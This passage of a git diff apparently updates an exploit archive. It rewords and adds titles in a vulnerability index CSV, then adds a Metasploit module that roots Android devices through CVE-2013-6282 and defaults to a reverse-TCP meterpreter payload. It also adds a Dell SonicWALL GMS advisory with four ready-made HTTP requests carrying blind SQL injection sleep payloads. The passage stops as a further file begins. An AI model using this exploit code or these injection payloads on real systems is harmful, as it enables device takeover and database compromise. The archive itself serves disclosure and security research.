Traversal",2008-10-24,H!tm@N,php,webapps,0 6827,platforms/php/webapps/6827.txt,"Joomla! Component Kbase 1.0 - SQL Injection",2008-10-24,H!tm@N,php,webapps,0 -6829,platforms/php/webapps/6829.txt,"Aj RSS Reader - 'EditUrl.php url' SQL Injection",2008-10-24,yassine_enp,php,webapps,0 +6829,platforms/php/webapps/6829.txt,"Aj RSS Reader - 'url' Parameter SQL Injection",2008-10-24,yassine_enp,php,webapps,0 6830,platforms/php/webapps/6830.txt,"NEPT Image Uploader 1.0 - Arbitrary File Upload",2008-10-24,Dentrasi,php,webapps,0 6833,platforms/php/webapps/6833.txt,"phpdaily - SQL Injection / Cross-Site Scripting / Local File Download",2008-10-24,0xFFFFFF,php,webapps,0 6835,platforms/php/webapps/6835.txt,"BuzzyWall 1.3.1 - 'id' Parameter Remote File Disclosure",2008-10-24,b3hz4d,php,webapps,0 6836,platforms/php/webapps/6836.txt,"Tlnews 2.2 - Insecure Cookie Handling",2008-10-25,x0r,php,webapps,0 6837,platforms/php/webapps/6837.txt,"Kasra CMS - 'index.php' Multiple SQL Injection",2008-10-25,G4N0K,php,webapps,0 6839,platforms/php/webapps/6839.txt,"PozScripts Classified Auctions - 'gotourl.php id' SQL Injection",2008-10-26,"Hussin X",php,webapps,0 -6842,platforms/php/webapps/6842.txt,"WordPress Plugin Media Holder - 'mediaHolder.php id' SQL Injection",2008-10-26,boom3rang,php,webapps,0 -6843,platforms/php/webapps/6843.txt,"SFS Ez Forum - 'forum.php id' SQL Injection",2008-10-26,Hurley,php,webapps,0 +6842,platforms/php/webapps/6842.txt,"WordPress Plugin Media Holder - SQL Injection",2008-10-26,boom3rang,php,webapps,0 +6843,platforms/php/webapps/6843.txt,"SFS Ez Forum - SQL Injection",2008-10-26,Hurley,php,webapps,0 6844,platforms/php/webapps/6844.pl,"MyForum 1.3 - (lecture.php id) SQL Injection",2008-10-26,Vrs-hCk,php,webapps,0 6845,platforms/cgi/webapps/6845.txt,"Ads Pro - 'dhtml.pl' Remote Command Execution",2008-10-26,S0l1D,cgi,webapps,0 6846,platforms/php/webapps/6846.txt,"MyForum 1.3 - (padmin) Local File Inclusion",2008-10-27,Vrs-hCk,php,webapps,0 @@ -19748,7 +19749,7 @@ id,file,description,date,author,platform,type,port 6848,platforms/php/webapps/6848.txt,"TlAds 1.0 - Remote Insecure Cookie Handling",2008-10-27,x0r,php,webapps,0 6849,platforms/php/webapps/6849.txt,"e107 Plugin alternate_profiles - 'id' SQL Injection",2008-10-27,boom3rang,php,webapps,0 6850,platforms/php/webapps/6850.txt,"MyKtools 2.4 - (langage) Local File Inclusion",2008-10-27,x0r,php,webapps,0 -6852,platforms/php/webapps/6852.pl,"e107 Plugin EasyShop - (category_id) Blind SQL Injection",2008-10-27,StAkeR,php,webapps,0 +6852,platforms/php/webapps/6852.pl,"e107 Plugin EasyShop - 'category_id' Parameter Blind SQL Injection",2008-10-27,StAkeR,php,webapps,0 6853,platforms/php/webapps/6853.txt,"questcms - Cross-Site Scripting / Directory Traversal / SQL Injection",2008-10-27,d3b4g,php,webapps,0 6854,platforms/php/webapps/6854.txt,"AIOCP 1.4 - 'poll_id' SQL Injection",2008-10-27,ExSploiters,php,webapps,0 6855,platforms/php/webapps/6855.txt,"MyKtools 2.4 - Arbitrary Database Backup",2008-10-27,Stack,php,webapps,0 @@ -20067,7 +20068,7 @@ id,file,description,date,author,platform,type,port 7235,platforms/php/webapps/7235.txt,"Jamit Job Board 3.x - (show_emp) Blind SQL Injection",2008-11-25,XaDoS,php,webapps,0 7236,platforms/php/webapps/7236.txt,"WebStudio CMS - (pageid) Blind SQL Injection (mil mixup)",2008-11-26,"BorN To K!LL",php,webapps,0 7237,platforms/php/webapps/7237.txt,"CMS Ortus 1.13 - SQL Injection",2008-11-26,otmorozok428,php,webapps,0 -7238,platforms/php/webapps/7238.txt,"Post Affiliate Pro 3 - (umprof_status) Blind SQL Injection",2008-11-26,XaDoS,php,webapps,0 +7238,platforms/php/webapps/7238.txt,"Post Affiliate Pro 3 - 'umprof_status' Parameter Blind SQL Injection",2008-11-26,XaDoS,php,webapps,0 7239,platforms/php/webapps/7239.txt,"ParsBlogger - 'blog.asp wr' SQL Injection",2008-11-26,"BorN To K!LL",php,webapps,0 7240,platforms/php/webapps/7240.txt,"Star Articles 6.0 - Blind SQL Injection (1)",2008-11-26,b3hz4d,php,webapps,0 7241,platforms/php/webapps/7241.txt,"TxtBlog 1.0 Alpha - (index.php m) Local File Inclusion",2008-11-27,"CWH Underground",php,webapps,0 @@ -20618,7 +20619,7 @@ id,file,description,date,author,platform,type,port 7999,platforms/php/webapps/7999.pl,"Simple PHP News 1.0 - Remote Command Execution",2009-02-06,Osirys,php,webapps,0 8000,platforms/php/webapps/8000.txt,"Zeroboard4 pl8 (07.12.17) - Multiple Vulnerabilities",2009-02-06,make0day,php,webapps,0 8001,platforms/php/webapps/8001.txt,"Mailist 3.0 - Insecure Backup / Local File Inclusion",2009-02-06,SirGod,php,webapps,0 -8002,platforms/php/webapps/8002.txt,"CafeEngine - 'index.php catid' SQL Injection",2009-02-06,SuNHouSe2,php,webapps,0 +8002,platforms/php/webapps/8002.txt,"CafeEngine - 'catid' Parameter SQL Injection",2009-02-06,SuNHouSe2,php,webapps,0 8003,platforms/php/webapps/8003.pl,"1024 CMS 1.4.4 - Remote Command Execution with Remote File Inclusion (c99)",2009-02-06,JosS,php,webapps,0 8004,platforms/php/webapps/8004.txt,"SilverNews 2.04 - Authentication Bypass / Local File Inclusion / Remote Code Execution",2009-02-06,x0r,php,webapps,0 8005,platforms/php/webapps/8005.txt,"phpYabs 0.1.2 - (Azione) Remote File Inclusion",2009-02-06,Arka69,php,webapps,0 @@ -21422,7 +21423,7 @@ id,file,description,date,author,platform,type,port 9351,platforms/php/webapps/9351.txt,"Payment Processor Script (PPScript) - 'shop.htm cid' SQL Injection",2009-08-03,ZoRLu,php,webapps,0 9353,platforms/php/webapps/9353.txt,"MOC Designs PHP News 1.1 - (Authentication Bypass) SQL Injection",2009-08-04,SirGod,php,webapps,0 9355,platforms/php/webapps/9355.txt,"elgg 1.5 - (/_css/js.php) Local File Inclusion",2009-08-04,eLwaux,php,webapps,0 -9356,platforms/php/webapps/9356.txt,"shopmaker CMS 2.0 - Blind SQL Injection / Local File Inclusion",2009-08-04,PLATEN,php,webapps,0 +9356,platforms/php/webapps/9356.txt,"ShopMaker CMS 2.0 - Blind SQL Injection / Local File Inclusion",2009-08-04,PLATEN,php,webapps,0 9357,platforms/cgi/webapps/9357.txt,"Perl$hop E-Commerce Script - Trust Boundary Input Parameter Injection",2009-08-04,Shadow,cgi,webapps,0 9358,platforms/php/webapps/9358.txt,"In-portal 4.3.1 - (index.php env) Local File Inclusion",2009-08-04,"Angela Chang",php,webapps,0 9365,platforms/php/webapps/9365.txt,"mybackup 1.4.0 - File Download / Remote File Inclusion",2009-08-05,SirGod,php,webapps,0 @@ -23353,7 +23354,7 @@ id,file,description,date,author,platform,type,port 13754,platforms/multiple/webapps/13754.txt,"JForum 2.1.8 BookMarks - Cross-Site Request Forgery / Cross-Site Scripting",2010-06-07,"Adam Baldwin",multiple,webapps,0 13762,platforms/php/webapps/13762.txt,"CommonSense CMS - SQL Injection",2010-06-07,Pokeng,php,webapps,0 13766,platforms/php/webapps/13766.txt,"Home of MCLogin System - Authentication Bypass",2010-06-08,"L0rd CrusAd3r",php,webapps,0 -13769,platforms/php/webapps/13769.txt,"CafeEngine CMS 2.3 - SQL Injection",2010-06-08,Sid3^effects,php,webapps,0 +13769,platforms/php/webapps/13769.txt,"CafeEngine 2.3 - SQL Injection",2010-06-08,Sid3^effects,php,webapps,0 13770,platforms/php/webapps/13770.txt,"Hotel / Resort Site Script with OnLine Reservation System - SQL Injection",2010-06-08,"L0rd CrusAd3r",php,webapps,0 13771,platforms/php/webapps/13771.txt,"EMO Realty Manager - SQL Injection",2010-06-08,"L0rd CrusAd3r",php,webapps,0 13772,platforms/php/webapps/13772.txt,"Rayzz Photoz - Arbitrary File Upload",2010-06-08,Sid3^effects,php,webapps,0 @@ -27559,8 +27560,8 @@ id,file,description,date,author,platform,type,port 25529,platforms/asp/webapps/25529.txt,"StorePortal 2.63 - default.asp Multiple SQL Injection",2005-04-25,Dcrab,asp,webapps,0 25530,platforms/asp/webapps/25530.txt,"OneWorldStore - IDOrder Information Disclosure",2005-04-25,Lostmon,asp,webapps,0 25531,platforms/php/webapps/25531.html,"PHPMyVisites 1.3 - Set_Lang File Inclusion",2005-04-26,"Max Cerny",php,webapps,0 -25532,platforms/php/webapps/25532.txt,"Yappa-NG 1.x/2.x - Unspecified Remote File Inclusion",2005-04-24,"James Bercegay",php,webapps,0 -25533,platforms/php/webapps/25533.txt,"Yappa-NG 1.x/2.x - Unspecified Cross-Site Scripting",2005-04-24,"James Bercegay",php,webapps,0 +25532,platforms/php/webapps/25532.txt,"Yappa-ng 1.x/2.x - Unspecified Remote File Inclusion",2005-04-24,"James Bercegay",php,webapps,0 +25533,platforms/php/webapps/25533.txt,"Yappa-ng 1.x/2.x - Unspecified Cross-Site Scripting",2005-04-24,"James Bercegay",php,webapps,0 25534,platforms/php/webapps/25534.txt,"SqWebMail 3.x/4.0 - HTTP Response Splitting",2005-04-15,Zinho,php,webapps,0 25535,platforms/php/webapps/25535.txt,"Invision Power Board 2.0.1 - QPid Parameter SQL Injection",2005-04-26,SVT,php,webapps,0 25536,platforms/asp/webapps/25536.txt,"MetaCart E-Shop V-8 - IntProdID Parameter SQL Injection",2005-04-26,Dcrab,asp,webapps,0 @@ -28980,9 +28981,9 @@ id,file,description,date,author,platform,type,port 27364,platforms/php/webapps/27364.txt,"Game-Panel 2.6 - 'login.php' Cross-Site Scripting",2006-03-06,Retard,php,webapps,0 27557,platforms/php/webapps/27557.pl,"PHPSelect Submit-A-Link - HTML Injection",2006-04-01,s3rv3r_hack3r,php,webapps,0 27367,platforms/php/webapps/27367.txt,"Link Bank - Iframe.php Cross-Site Scripting",2006-03-07,Retard,php,webapps,0 -27368,platforms/php/webapps/27368.txt,"LoudBlog 0.41 - podcast.php id Parameter SQL Injection",2006-03-07,tzitaroth,php,webapps,0 +27368,platforms/php/webapps/27368.txt,"LoudBlog 0.41 - 'podcast.php' SQL Injection",2006-03-07,tzitaroth,php,webapps,0 27369,platforms/php/webapps/27369.txt,"LoudBlog 0.41 - 'index.php' template Parameter Traversal Arbitrary File Access",2006-03-07,tzitaroth,php,webapps,0 -27370,platforms/php/webapps/27370.txt,"LoudBlog 0.41 - backend_settings.php language Parameter Traversal Arbitrary File Access",2006-03-07,tzitaroth,php,webapps,0 +27370,platforms/php/webapps/27370.txt,"LoudBlog 0.41 - 'backend_settings.php' Traversal Arbitrary File Access",2006-03-07,tzitaroth,php,webapps,0 27371,platforms/php/webapps/27371.txt,"HitHost 1.0 - deleteuser.php user Parameter Cross-Site Scripting",2006-03-06,Retard,php,webapps,0 27372,platforms/php/webapps/27372.txt,"HitHost 1.0 - viewuser.php hits Parameter Cross-Site Scripting",2006-03-06,Retard,php,webapps,0 27373,platforms/php/webapps/27373.txt,"TextFileBB 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-08,Retard,php,webapps,0 @@ -29309,7 +29310,7 @@ id,file,description,date,author,platform,type,port 27800,platforms/php/webapps/27800.txt,"Pinnacle Cart 3.3 - 'index.php' Cross-Site Scripting",2006-05-02,r0t,php,webapps,0 27803,platforms/php/webapps/27803.txt,"321soft PHP-Gallery 0.9 - 'index.php' path Variable Arbitrary Directory Listing",2006-05-03,d4igoro,php,webapps,0 27804,platforms/php/webapps/27804.txt,"321soft PHP-Gallery 0.9 - 'index.php' path Parameter Cross-Site Scripting",2006-05-03,d4igoro,php,webapps,0 -27807,platforms/php/webapps/27807.txt,"Fast Click SQL Lite 1.1.2/1.1.3 - show.php Remote File Inclusion",2006-05-03,R@1D3N,php,webapps,0 +27807,platforms/php/webapps/27807.txt,"Fast Click SQL Lite 1.1.2/1.1.3 - 'show.php' Remote File Inclusion",2006-05-03,R@1D3N,php,webapps,0 27808,platforms/php/webapps/27808.txt,"Pacheckbook 1.1 - 'index.php' Multiple SQL Injection",2006-05-03,almaster,php,webapps,0 27809,platforms/php/webapps/27809.txt,"MyNews 1.6.2 - Multiple Cross-Site Scripting Vulnerabilities",2006-05-03,DreamLord,php,webapps,0 27810,platforms/php/webapps/27810.txt,"Albinator 2.0.8 - dlisting.php cid Parameter Cross-Site Scripting",2006-05-02,r0t,php,webapps,0 @@ -29639,7 +29640,7 @@ id,file,description,date,author,platform,type,port 28308,platforms/php/webapps/28308.txt,"Banex PHP MySQL Banner Exchange 2.21 - members.php cfg_root Parameter Remote File Inclusion",2006-07-31,SirDarckCat,php,webapps,0 28309,platforms/php/webapps/28309.txt,"Seir Anphin V666 Community Management System - Multiple SQL Injections",2006-07-31,CR,php,webapps,0 28310,platforms/php/webapps/28310.txt,"Moskool 1.5 Component - Admin.Moskool.php Remote File Inclusion",2006-07-31,saudi.unix,php,webapps,0 -28311,platforms/php/webapps/28311.txt,"myEvent 1.2/1.3 - Myevent.php Remote File Inclusion",2006-07-31,CeNGiZ-HaN,php,webapps,0 +28311,platforms/php/webapps/28311.txt,"myEvent 1.2/1.3 - 'myevent.php' Remote File Inclusion",2006-07-31,CeNGiZ-HaN,php,webapps,0 28315,platforms/php/webapps/28315.txt,"Help Center Live 2.1.2 - module.php Directory Traversal",2006-07-31,Dr.GooGle,php,webapps,0 28316,platforms/php/webapps/28316.txt,"TinyPHPForum 3.6 - Multiple Cross-Site Scripting Vulnerabilities (2)",2006-07-31,SirDarckCat,php,webapps,0 28317,platforms/php/webapps/28317.txt,"WoW Roster 1.5 - hsList.php subdir Parameter Remote File Inclusion",2006-08-01,skulmatic,php,webapps,0 @@ -32192,12 +32193,12 @@ id,file,description,date,author,platform,type,port 32141,platforms/php/webapps/32141.txt,"Homes 4 Sale - 'results.php' Cross-Site Scripting",2008-08-04,"Ghost Hacker",php,webapps,0 32142,platforms/php/webapps/32142.php,"Pligg 9.9.5 - 'CAPTCHA' Registration Automation Security Bypass",2008-08-02,"Micheal Brooks",php,webapps,0 32143,platforms/php/webapps/32143.txt,"Keld PHP-MySQL News Script 0.7.1 - 'login.php' SQL Injection",2008-08-04,crimsoN_Loyd9,php,webapps,0 -32144,platforms/php/webapps/32144.txt,"Meeting Room Booking System (MRBS) 1.2.6 - day.php area Parameter Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0 -32145,platforms/php/webapps/32145.txt,"Meeting Room Booking System (MRBS) 1.2.6 - week.php area Parameter Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0 -32146,platforms/php/webapps/32146.txt,"Meeting Room Booking System (MRBS) 1.2.6 - month.php area Parameter Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0 -32147,platforms/php/webapps/32147.txt,"Meeting Room Booking System (MRBS) 1.2.6 - search.php area Parameter Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0 -32148,platforms/php/webapps/32148.txt,"Meeting Room Booking System (MRBS) 1.2.6 - report.php area Parameter Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0 -32149,platforms/php/webapps/32149.txt,"Meeting Room Booking System (MRBS) 1.2.6 - help.php area Parameter Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0 +32144,platforms/php/webapps/32144.txt,"Meeting Room Booking System (MRBS) 1.2.6 - 'day.php' Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0 +32145,platforms/php/webapps/32145.txt,"Meeting Room Booking System (MRBS) 1.2.6 - 'week.php' Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0 +32146,platforms/php/webapps/32146.txt,"Meeting Room Booking System (MRBS) 1.2.6 - 'month.php' Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0 +32147,platforms/php/webapps/32147.txt,"Meeting Room Booking System (MRBS) 1.2.6 - 'search.php' Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0 +32148,platforms/php/webapps/32148.txt,"Meeting Room Booking System (MRBS) 1.2.6 - 'report.php' Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0 +32149,platforms/php/webapps/32149.txt,"Meeting Room Booking System (MRBS) 1.2.6 - 'help.php' Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0 32150,platforms/php/webapps/32150.txt,"UNAK-CMS 1.5 - 'connector.php' Local File Inclusion",2008-08-04,"Sina Yazdanmehr",php,webapps,0 32151,platforms/asp/webapps/32151.pl,"Pcshey Portal - 'kategori.asp' SQL Injection",2008-08-04,U238,asp,webapps,0 32157,platforms/asp/webapps/32157.txt,"Kentico CMS 7.0.75 - User Information Disclosure",2014-03-10,"Charlie Campbell and Lyndon Mendoza",asp,webapps,80 @@ -32489,8 +32490,8 @@ id,file,description,date,author,platform,type,port 32636,platforms/php/webapps/32636.txt,"Orkut Clone - profile_social.php id Parameter SQL Injection",2008-12-02,d3b4g,php,webapps,0 32637,platforms/php/webapps/32637.txt,"Orkut Clone - profile_social.php id Parameter Cross-Site Scripting",2008-12-02,d3b4g,php,webapps,0 32638,platforms/php/webapps/32638.txt,"Horde Webmail 5.1 - Open Redirect",2014-04-01,"felipe andrian",php,webapps,0 -32639,platforms/php/webapps/32639.txt,"yappa-ng - 'index.php' album Parameter Cross-Site Scripting",2008-12-03,Pouya_Server,php,webapps,0 -32640,platforms/php/webapps/32640.txt,"yappa-ng - Query String Cross-Site Scripting",2008-12-03,Pouya_Server,php,webapps,0 +32639,platforms/php/webapps/32639.txt,"Yappa-ng - 'index.php' album Parameter Cross-Site Scripting",2008-12-03,Pouya_Server,php,webapps,0 +32640,platforms/php/webapps/32640.txt,"Yappa-ng - Query String Cross-Site Scripting",2008-12-03,Pouya_Server,php,webapps,0 32641,platforms/php/webapps/32641.txt,"RevSense 1.0 - SQL Injection / Cross-Site Scripting",2008-12-04,Pouya_Server,php,webapps,0 32642,platforms/php/webapps/32642.txt,"PHPSTREET WebBoard 1.0 - 'show.php' SQL Injection",2008-12-04,"CWH Underground",php,webapps,0 32644,platforms/php/webapps/32644.txt,"Alienvault 4.5.0 - Authenticated SQL Injection (Metasploit)",2014-04-01,"Brandon Perry",php,webapps,443 @@ -35809,12 +35810,10 @@ id,file,description,date,author,platform,type,port 38178,platforms/php/webapps/38178.txt,"WordPress Plugin NextGEN Gallery - 'test-head' Parameter Cross-Site Scripting",2013-01-08,Am!r,php,webapps,0 38173,platforms/multiple/webapps/38173.txt,"ManageEngine EventLog Analyzer < 10.6 build 10060 - SQL Execution",2015-09-14,xistence,multiple,webapps,0 38174,platforms/multiple/webapps/38174.txt,"ManageEngine OpManager 11.5 - Multiple Vulnerabilities",2015-09-14,xistence,multiple,webapps,0 -38180,platforms/php/webapps/38180.txt,"tinybrowser - /tiny_mce/plugins/tinybrowser/edit.php type Parameter Cross-Site Scripting",2013-01-09,MustLive,php,webapps,0 38176,platforms/php/webapps/38176.txt,"WordPress Plugin EZ SQL Reports < 4.11.37 - Multiple Vulnerabilities",2015-09-14,"Felipe Molina",php,webapps,0 -38181,platforms/php/webapps/38181.txt,"tinybrowser - /tiny_mce/plugins/tinybrowser/upload.php type Parameter Cross-Site Scripting",2013-01-09,MustLive,php,webapps,0 -38182,platforms/php/webapps/38182.txt,"tinybrowser - /tiny_mce/plugins/tinybrowser/tinybrowser.php type Parameter Cross-Site Scripting",2013-01-09,MustLive,php,webapps,0 -38183,platforms/php/webapps/38183.txt,"tinybrowser - /tiny_mce/plugins/tinybrowser/tinybrowser.php Empty type Parameter Directory Listing",2013-01-09,MustLive,php,webapps,0 -38184,platforms/php/webapps/38184.txt,"tinybrowser - /tiny_mce/plugins/tinybrowser/edit.php Empty type Parameter Directory Listing",2013-01-09,MustLive,php,webapps,0 +38182,platforms/php/webapps/38182.txt,"tinybrowser - 'type' Parameter Cross-Site Scripting",2013-01-09,MustLive,php,webapps,0 +38183,platforms/php/webapps/38183.txt,"tinybrowser - 'tinybrowser.php' Directory Listing",2013-01-09,MustLive,php,webapps,0 +38184,platforms/php/webapps/38184.txt,"tinybrowser - 'edit.php' Directory Listing",2013-01-09,MustLive,php,webapps,0 38187,platforms/php/webapps/38187.txt,"WordPress Plugin CP Reservation Calendar 1.1.6 - SQL Injection",2015-09-15,"i0akiN SEC-LABORATORY",php,webapps,80 38188,platforms/jsp/webapps/38188.txt,"Openfire 3.10.2 - Unrestricted Arbitrary File Upload",2015-09-15,hyp3rlinx,jsp,webapps,80 38189,platforms/jsp/webapps/38189.txt,"Openfire 3.10.2 - Remote File Inclusion",2015-09-15,hyp3rlinx,jsp,webapps,0 @@ -36926,3 +36925,8 @@ id,file,description,date,author,platform,type,port 40969,platforms/php/webapps/40969.pl,"PHPMailer < 5.2.20 - Remote Code Execution",2016-12-27,"Dawid Golunski",php,webapps,0 40971,platforms/php/webapps/40971.txt,"WordPress Plugin Simply Poll 1.4.1 - SQL Injection",2016-12-28,"TAD GROUP",php,webapps,0 40972,platforms/php/webapps/40972.php,"SwiftMailer < 5.4.5-DEV - Remote Code Execution",2016-12-28,"Dawid Golunski",php,webapps,0 +40973,platforms/php/webapps/40973.txt,"Joomla! Component aWeb Cart Watching System for Virtuemart 2.6.0 - SQL Injection",2016-12-28,qemm,php,webapps,0 +40974,platforms/php/webapps/40974.py,"PHPMailer < 5.2.18 - Remote Code Execution (Python)",2016-12-29,anarc0der,php,webapps,0 +40976,platforms/php/webapps/40976.txt,"WordPress Plugin Slider Templatic Tevolution < 2.3.6 - Arbitrary File Upload",2016-12-29,r3m1ck,php,webapps,0 +40977,platforms/hardware/webapps/40977.txt,"Dell SonicWALL Global Management System GMS 8.1 - Blind SQL Injection",2016-12-29,LiquidWorm,hardware,webapps,0 +40978,platforms/hardware/webapps/40978.txt,"Dell SonicWALL Secure Mobile Access SMA 8.1 - Cross-Site Scripting / Cross-Site Request Forgery",2016-12-29,LiquidWorm,hardware,webapps,0 diff --git a/platforms/android/local/40975.rb b/platforms/android/local/40975.rb new file mode 100755 index 000000000..0a3a7df3d --- /dev/null +++ b/platforms/android/local/40975.rb @@ -0,0 +1,81 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'rex' + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Post::File + include Msf::Post::Common + + def initialize(info={}) + super( update_info( info, { + 'Name' => "Android get_user/put_user Exploit", + 'Description' => %q{ + This module exploits a missing check in the get_user and put_user API functions + in the linux kernel before 3.5.5. The missing checks on these functions + allow an unprivileged user to read and write kernel memory. + This exploit first reads the kernel memory to identify the commit_creds and + ptmx_fops address, then uses the write primitive to execute shellcode as uid 0. + The exploit was first discovered in the wild in the vroot rooting application. + }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'fi01', # libget_user_exploit / libput_user_exploit + 'cubeundcube', # kallsyms_in_memory + 'timwr', # Metasploit module + ], + 'References' => + [ + [ 'CVE', '2013-6282' ], + [ 'URL', 'http://forum.xda-developers.com/showthread.php?t=2434453' ], + [ 'URL', 'https://github.com/fi01/libget_user_exploit' ], + [ 'URL', 'http://forum.xda-developers.com/showthread.php?t=2565758' ], + ], + 'DisclosureDate' => "Sep 06 2013", + 'SessionTypes' => [ 'meterpreter' ], + "Platform" => [ "android", "linux" ], + 'Targets' => [[ 'Automatic', { }]], + 'Payload' => { 'Space' => 2048, }, + 'DefaultOptions' => + { + 'WfsDelay' => 120, + 'PAYLOAD' => 'linux/armle/mettle/reverse_tcp', + }, + 'DefaultTarget' => 0, + } + )) + end + + def exploit + local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2013-6282.so" ) + exploit_data = File.read(local_file, {:mode => 'rb'}) + + space = payload_space + payload_encoded = payload.encoded + + # Substitute the exploit shellcode with our own + exploit_data.gsub!("\x90" * 4 + "\x00" * (space - 4), payload_encoded + "\x90" * (payload_encoded.length - space)) + + workingdir = session.fs.dir.getwd + remote_file = "#{workingdir}/#{Rex::Text::rand_text_alpha_lower(5)}" + write_file(remote_file, exploit_data) + + print_status("Loading exploit library #{remote_file}") + session.core.load_library( + 'LibraryFilePath' => local_file, + 'TargetFilePath' => remote_file, + 'UploadLibrary' => false, + 'Extension' => false, + 'SaveToDisk' => false + ) + print_status("Loaded library #{remote_file}, deleting") + session.fs.file.rm(remote_file) + print_status("Waiting #{datastore['WfsDelay']} seconds for payload") + end + +end diff --git a/platforms/hardware/webapps/40977.txt b/platforms/hardware/webapps/40977.txt new file mode 100755 index 000000000..4b0b98317 --- /dev/null +++ b/platforms/hardware/webapps/40977.txt @@ -0,0 +1,112 @@ + +Dell SonicWALL Global Management System GMS 8.1 Blind SQL Injection + + +Vendor: Dell Inc. +Product web page: https://www.sonicwall.com/products/sonicwall-gms/ +Affected version: 8.1 + 8.0 SP1 Build 8048.1410 + Flow Server Virtual Appliance + +Fixed in: 8.2 (VR-2016-01-C0V) + +Summary: Provide your organization, distributed enterprise or managed +service offering with an intuitive, powerful way to rapidly deploy and +centrally manage SonicWall solutions, with SonicWall GMS. Get more value +from your firewall, secure remote access, anti-spam, and backup and recovery +solutions with enhanced network security monitoring and robust network +security reporting. By deploying GMS in an enterprise, you can minimize +administrative overhead by streamlining security appliance deployment +and policy management. + +Desc: Dell SonicWALL GMS suffers from multiple SQL Injection vulnerabilities. +Input passed via the GET parameters 'searchBySonicwall', 'firstChangeOrderID', +'secondChangeOrderID' and 'coDomainID' is not properly sanitised before being +returned to the user or used in SQL queries. This can be exploited to manipulate +SQL queries by injecting arbitrary SQL code. + +Tested on: SonicWALL + MySQL/5.0.96-community-nt + Apache-Coyote/1.1 + Apache Tomcat 6.0.41 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2016-5388 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5388.php + +Vendor: https://support.sonicwall.com/product-notification/215257?productName=SonicWALL%20GMS + + +26.01.2016 + +-- + + +Blind SQL Injection via several parameters: + +- searchBySonicwall (GET) +- coDomainID (GET) +- firstChangeOrderID (GET) +- secondChangeOrderID (GET) + + +PoC: + +#1 + +GET /sgms/TaskViewServlet?page=taskView&level=1&node_id=null&screenid=15200&unused=&help_url=&node_name=null&unitType=0&searchBySonicwall=null'%2b(select*from(select(sleep(6)))a)%2b' HTTP/1.1 +Host: 127.0.0.1 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 +Referer: http://127.0.0.1/sgms/content.jsp +Accept-Encoding: gzip, deflate, sdch +Accept-Language: en-US,en;q=0.8 +Cookie: JSESSIONID=DF100D251227D2BCF4DE79779C0B57E3; JSESSIONID=36E7B71D9E7367E56E005E279BCBECED; SSOSESSIONID=DF100D251227D2BCF4DE79779C0B57E3 +Connection: close + + +#2 + +GET /sgms/Logs?page=logView&searchByCO=Workflow%20Change%20Order%20Example&coDomainID=DMN0000000000000000000000001'%2b(select*from(select(sleep(6)))a)%2b'&level=1&node_id=null&screenid=15150&unused=&help_url=&node_name=null&unitType=0&searchBySonicwall=null HTTP/1.1 +Host: 127.0.0.1 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 +Referer: http://127.0.0.1/sgms/content.jsp +Accept-Encoding: gzip, deflate, sdch +Accept-Language: en-US,en;q=0.8 +Cookie: JSESSIONID=DF100D251227D2BCF4DE79779C0B57E3; JSESSIONID=36E7B71D9E7367E56E005E279BCBECED; SSOSESSIONID=DF100D251227D2BCF4DE79779C0B57E3 +Connection: close + + +#3 + +GET /sgms/workflow?page=fetchCompareScreens&firstChangeOrderID=CHO14532479280350040102377D2'%2b(select*from(select(sleep(6)))a)%2b'&secondChangeOrderID=CHO14520472477130040102377D2&_dc=1453805798333&node=root HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 +X-Requested-With: XMLHttpRequest +Accept: */* +Referer: http://127.0.0.1/sgms/viewdiff.jsp +Accept-Encoding: gzip, deflate, sdch +Accept-Language: en-US,en;q=0.8 +Cookie: JSESSIONID=DF100D251227D2BCF4DE79779C0B57E3; JSESSIONID=36E7B71D9E7367E56E005E279BCBECED; SSOSESSIONID=DF100D251227D2BCF4DE79779C0B57E3 +Connection: close + + +#4 + +GET /sgms/workflow?page=fetchCompareScreens&firstChangeOrderID=CHO14532479280350040102377D2&secondChangeOrderID=CHO14520472477130040102377D2'%2b(select*from(select(sleep(6)))a)%2b'&_dc=1453805798333&node=root HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 +X-Requested-With: XMLHttpRequest +Accept: */* +Referer: http://127.0.0.1/sgms/viewdiff.jsp +Accept-Encoding: gzip, deflate, sdch +Accept-Language: en-US,en;q=0.8 +Cookie: JSESSIONID=DF100D251227D2BCF4DE79779C0B57E3; JSESSIONID=36E7B71D9E7367E56E005E279BCBECED; SSOSESSIONID=DF100D251227D2BCF4DE79779C0B57E3 +Connection: close diff --git a/platforms/hardware/webapps/40978.txt 